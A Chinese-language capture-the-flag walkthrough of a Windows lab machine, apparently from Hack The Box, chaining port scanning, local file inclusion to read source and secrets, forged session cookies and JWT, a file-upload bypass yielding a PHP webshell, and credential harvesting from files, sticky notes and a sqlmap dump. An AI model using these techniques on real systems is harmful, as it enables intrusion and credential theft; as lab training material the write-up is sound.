基本信息

端口扫描

22,80,443,3306加一些windows常规端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ nmap -sC -sV 10.10.10.228
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 13:43 CST
Nmap scan report for 10.10.10.228
Host is up (0.068s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_http-title: Library
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_http-title: Library
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
| fingerprint-strings:
|   ms-sql-s:
|_    Host '10.10.14.7' is not allowed to connect to this MariaDB server
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/22%Time=6033448D%P=x86_64-apple-darwin19.6.
SF:0%r(ms-sql-s,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.7'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-22T05:43:45
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.72 seconds

80/443

一个图书馆网站:

目录扫描

目录扫描可以得到一些其他目录:

1
2
3
4
5
6
7
8
9
10
11
gobuster dir -u http://10.10.10.228/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50


/books (Status: 301)
/css (Status: 301)
/db (Status: 301)
/includes (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/php (Status: 301)
/portal (Status: 301)

目录遍历

这些目录直接访问可以得到文件名,结合后面的LFI读源码:

portal

portal可以注册登录,同样可以根据文件名结合后面的LFI:

LFI

search除了输入的title和author外还有个method参数,直接将其修改为你1得到报错信息:

缺少book参数,手动添加可以看出是直接去读取文件内容:

lfi

就是一步步读源码,得到cookie和JWT相关生成信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
book=../index.php
book=../php/books.php
book=../includes/bookController.php
book=../db/db.php

<?php
$host="localhost";
$port=3306;
$user="bread";
$password="jUli901";
$dbname="bread";
$con = new mysqli($host, $user, $password, $dbname, $port) or die ('Could not connect to the database server' . mysqli_connect_error());
?>

book=../portal/login.php
book=../portal/authController.php

session_id(makesession($username));
session_start();
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
            
$jwt = JWT::encode($payload, $secret_key, 'HS256');

function makesession($username){
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528.\/9890";
    $session_cookie = $username.md5($key);
    return $session_cookie;
}

portal admin

在admins里可以看到admin用户信息,然后选一个根据已有信息生成对应的sesssionid和JWT:

1
PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

文件上传

现在是管理员权限,可以使用管理员功能例如文件上传,提示只支持zip文件但可以简单的burp修改上传:

直接上传html会默认是zip后缀:

需要添加有效数据,直接参考已有的复制就可以,然后修改后缀名为php:

现在我们有webshell:

信息

windows的机器,为了方便加载个meterpreter:

简单的翻一下目录,在一个json里得到juliette用户密码:

juliette.json

1
2
3
4
5
6
7
8
9
10
11
12
type juliette.json
{
	"pizza" : "margherita",
	"size" : "large",
	"drink" : "water",
	"card" : "VISA",
	"PIN" : "9890",
	"alternate" : {
		"username" : "juliette",
		"password" : "jUli901./())!",
	}
}

user flag

然后直接ssh连接,桌面得到user.txt:

StickyNotes

根据todo.html里的信息,去StickyNotes目录下载相应文件查看:

1
cd %LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

passwords

然后直接查看sqlite,得到几条密码:

1
2
3
juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

Development

然后以development用户登录,C盘Development目录下有个二进制文件,同样下载下来分析:

Krypter_Linux

看起来是自定义的密码管理工具,给出了curl相关参数:

Krypter

查看端口发现本机开着1234端口,就是上面看到的密码管理相关端口,可以转发端口出来后curl测试,得到一个aes key:

1
2
3
4
5
6
7
8
9
10
11
12
13
TCP    127.0.0.1:1234         0.0.0.0:0              LISTENING       2856

ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' 

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(16) "k19D193j.<19391("
  }
}

sql dump

可以直接sqlmap跑出来其他数据:

1
2
3
4
sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

aes_key : k19D193j.<19391(
password : H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

aes decrypt

然后aes解出来明文密码:

1
2
3
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0

p@ssw0rd!@#$9890./

root flag

administrator ssh登录,桌面得到root.txt:

参考资料